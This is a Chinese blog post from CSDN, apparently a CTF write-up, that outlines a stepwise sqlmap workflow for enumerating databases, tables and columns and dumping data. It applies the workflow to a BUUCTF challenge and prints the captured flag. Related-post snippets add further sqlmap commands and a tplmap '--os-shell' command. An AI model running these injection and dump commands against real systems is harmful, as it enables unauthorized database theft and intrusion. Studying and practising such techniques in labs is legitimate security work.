使用sqlmap的一般解题思路

最新推荐文章于 2024-05-30 14:52:09 发布
最新推荐文章于 2024-05-30 14:52:09 发布
阅读量146 收藏 1
点赞数
分类专栏: SQL注入 文章标签: sql 数据库
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/m0_62691847/article/details/129697687
版权

一般步骤

1、查看当前表:python sqlmap.py -u URL --dbs

2、查看表名: python sqlmap.py -u URL -D 数据库名(第一步查出)--tables

3、获取表的子段: python sqlmap.py -u URL -D 数据库名 -T 表名(第二步查出)--columns

4、查看dump的字段: python sqlmap.py -u URL  -D 数据库名 -T 表名 -C 字段内容(第三步查出)--dump

实例

题目:

 解题步骤:

1、点开链接出现界面

2、直接使用sqlmap注入,查看当前数据库

python sqlmap.py -u http://14ed36e3-ab93-4bbe-93b4-f8819dd45714.node4.buuoj.cn:81/index.php?id=1 --dbs

 

3、查看表名
python sqlmap.py -u http://14ed36e3-ab93-4bbe-93b4-f8819dd45714.node4.buuoj.cn:81/index.php?id=1 -D note --tables

 

 

4、 获取表的字段

pythonsqlmap.py -u http://14ed36e3-ab93-4bbe-93b4-f8819dd45714.node4.buuoj.cn:81/index.php?id=1 -D note -T fl4g --columns

 

 5、查看dump字段内容,得出flag
python sqlmap.py -u http://35bb1ac6-bf6d-4ece-af3f-8661e567e082.node4.buuoj.cn:81/index.php?id=1 -D note -T fl4g -C fllllag --dump

 

6、得出flag : n1book{union_select_is_so_cool} 

南冥羡谦
关注
  • 0
    点赞
  • 1
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
专栏目录
SQLMAP神器使用.pdf
01-05
sqlmap常见的命令使用以及实验步骤和方法
Sqlmap使用手册中文版
01-13
Sqlmap使用手册中文版 Sqlmap是十分著名的、自动化的SQL注入工具。 sqlmap简介 sqlmap支持五种不同的注入模式: 基于布尔的盲注 基于时间的盲注 基于报错注入 联合查询注入 堆叠注入 Sqlmap是开源的自动化SQL注入工具,由Python写成,具有如下特点: 完全支持MySQL、Oracle、PostgreSQL、Microsoft SQL Server、Microsoft Access、IBM DB2、SQLite、Firebird、Sybase、SAP MaxDB、HSQLDB和Informix等多种数据库管理系统。 完全支持布尔型盲注、时间型盲注、基于错误信息的注入、联合查询注入和堆查询注入。 在数据库证书、IP地址、端口和数据库名等条件允许的情况下支持不通过SQL注入点而直接连接数据库。 支持枚举用户、密码、哈希、权限、角色、数据库、数据表和列。 支持自动识别密码哈希格式并通过字典破解密码哈希。 支持完全地下载某个数据库中的某个表,也可以只下载某
SqlMap使用
06-24
本文档详细介绍了SqlMap使用教程,SQL注入攻击是黑客对数据库进行攻击的常用手段之一
sqlmap使用思路简图
12-09
介绍了各种情况下如何使用sqlmap,以及一些不常见参数的简介,当注入遇到瓶颈时可以拿出来找找思路
CTF刷题--SQL注入(sqlmap
weixin_43882862的博客
08-13 2197
靶场第一题,解法2,使用sqlmap 解题思路(在kali下操作) 1、检测是否有sql注入漏洞 检测出来有id sqlmap -u http://59.63.200.79:8003/?id=1 2、获取当前用户 sqlmap -u http://59.63.200.79:8003/?id=1 --current-user 3、获取当前数据库 sqlmap -u http://59.63.200.79:8003/?id=1 --current-db 4、获取所有数据库 sqlmap -u http:/
CTF学习-web解题思路
菜鸟-传奇
08-27 8437
CTF学习-web题思路 持续更新 基础篇 1.直接查看源代码 2.修改或添加HTTP请求头 常见的有: Referer来源伪造 X-Forwarded-For:ip伪造 User-Agent:用户代理(就是用什么浏览器什么的) //.net的版本修改,后面添加,如版本9 .NET CLR 9 Accept-Language:语言 Cookie的修改 3.查看HTTP请求头或响应头...
ctf解题思路
u014692982的博客
09-18 1890
web解题 1.hack bar看下路径 模板注入{{1+1}} kali python tplmap.py -u http://792.168.1.10:8000/?name=* python tplmap.py -u http://792.168.1.10:8000/?name=* --engine Nunjucks --os-shell 2.源码 看cookie session,读源码/index.php?page=php://filter/read=convert.base64-encode/r..
ctfhub 布尔盲注解题思路
weixin_41718413的博客
10-16 1808
注入点是id,使用工具sqlmap,链接https://sqlmap.org/ 1、找数据库,运行: python sqlmap.py -u url --current-db --level 5 获得当前的数据库: 2、找表: python sqlmap.py -u url -D sqli --tables 会提示information_shema不能用,是否使用common table(用字典爆破,猜测应该是通过延时或返回的content-length长度),输入y (截图是找c..
SQLMAP使用笔记.pdf
01-25
SQLMAP使用笔记
ISCTF新生赛 Web easy_sql题解(sqlmap的基操)
Landasika的博客
10-27 1439
先观察题目的提示,(由于是新生赛,所以提示比较明显)显然是需要我们用SQLMAP进行操作。 不妨输入 用户名 1 密码 1' or '1'='1 来进行简单的测试,果然登陆上了。但是返回的是“登陆成功”并没有返回数据库中的内容,于是也可以尝试尝试sql盲注的思路。 一、sqlmap解法 sqlmap的基本命令:Kali Linux 漏洞利用工具集 sqlmap 教程 - 付杰博客 某大神的sqlmap学习笔记:Kali Linux学习笔记—SQLMAP 自动注入_江河湖...
NSSCTF刷题笔记web14——[SWPUCTF 2021 新生赛]sql
qq_45692883的博客
01-26 279
粗劣试了一下,比较关键的是过滤了空格和等于。传的参数是wllm在源代码中有提示。第二步构造union语句查询数据库。使用mid函数对内容进行截取即可。然后我们再使用sqlmap跑跑看。空格我们可以用/**/代替。然后只露个头,我们截取一下。可以获取数据得到flag。第一步先确认字段数量。第五步,获取flag。
dvwa学习之 sql盲注
温和的跳跃
10-11 650
sql注入之盲注盲注是什么盲注有哪些方法盲注流程盲注场景举例lowmidhigh细节解析 盲注是什么 盲注是区别普通注入,普通sql注入可以看见报错的sql信息,盲注是看不见任何报错的信息,无法知道注入的语句有没有被执行,页面无明显变化,所以叫盲注 盲注有哪些方法 虽然页面没有明显变化但是通过你的fuzz还是会产生一定差别,比如输入正常的值产生正常页面,反之通过注入数据库函数bool语句观察页面变化,如果sql注入成功数据库是需要时间去执行的,所以还可以通过观察时间来判断。因此就有最基本的两种盲注办法:bo
sql注入学习心得与sqlmap使用心得
ancan8807的博客
04-07 885
做题是最好的老师 首先先来分享一下我用来练手的题目,实验吧中的简单的sql注入1,2,3 不得不说,sql注入真是一个神奇的东西,至少我以前看起来一点头绪都没有的题目能入手了 首先是简单的sql注入3(别问我为什么不是1) 打开链接之后发现 陷入沉思,这时候我决定使用sqlmap对他进行sql注入 在终端输入python2 sqlmap.py -u http://ctf5.s...
CISP-PTE八套真题详解(侵删)
00勇士王子的博客
12-02 4488
PTE八套模拟题详解,侵删
基础—SQL—DQL(数据查询语言)聚合函数
最新发布
m0_74363339的博客
05-30 379
这篇博客主要讲到了SQL分类中的DQL(数据查询语言)—聚合函数的讲解,聚合函数比较简单,但它主要配合着分组查询进行数据查询的操作,注意NULL的字段值不参与聚合函数的运算......
SQL Server定期收缩日志文件详细步骤——基于SQL Server 2012
lxcw_sir的博客
05-29 375
SQL Server定期收缩日志文件详细步骤——基于SQL Server 2012
PostgreSQL常用插件
PGCCC的博客
05-29 531
1.提供 PostgreSQL 实例的操作系统级别的资源使用情况,包括缓存命中率和磁盘 IO 等。通过使用这些插件,您可以大大增强 PostgreSQL 的功能,满足各种复杂的应用需求。1.提供三元组(trigram)相似度匹配和索引功能,常用于模糊搜索和文本相似度匹配。1.增加对地理空间数据的支持,使 PostgreSQL 成为一个功能强大的空间数据库。1.PostgreSQL 的过程语言,允许用户编写存储过程和触发器。1.基于逻辑复制的插件,提供更细粒度的数据复制控制和双向复制能力。
postgressql——Tuple学习(2)
Re_view的博客
05-27 283
postgressql——Tuple学习(2)
pycharm使用sqlmap
09-04
PyCharm是一款用于Python开发的集成开发环境(IDE),它并不直接支持SQLMap的功能。SQLMap是一款独立的工具,用于自动化进行SQL注入攻击和漏洞检测。 虽然PyCharm本身不能直接使用SQLMap,但你可以在PyCharm中集成SQLMap并与其进行交互。以下是一种可行的方法: 1. 首先,确保你已经安装了SQLMap。你可以在SQLMap的官方网站(https://github.com/sqlmapproject/sqlmap)上找到安装指南。 2. 在PyCharm中创建一个新的Python项目。 3. 打开PyCharm的终端或命令行界面。你可以在PyCharm的底部工具栏找到终端选项。 4. 在终端中,使用以下命令来执行SQLMap:`sqlmap [options]` 你可以根据需要传递不同的选项给SQLMap,例如指定目标URL、使用POST请求、指定参数等。完整的选项列表和用法可以通过运行`sqlmap --help`来查看。 5. 当SQLMap开始执行时,它将自动进行SQL注入攻击和漏洞检测。你可以在终端中看到输出结果。 请注意,使用SQLMap进行未经授权的攻击是非法的,并且严重违反道德和法律规定。在使用SQLMap或任何其他安全工具之前,请确保你具有合法的授权,并且只在合法和道德的范围内使用它们。

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值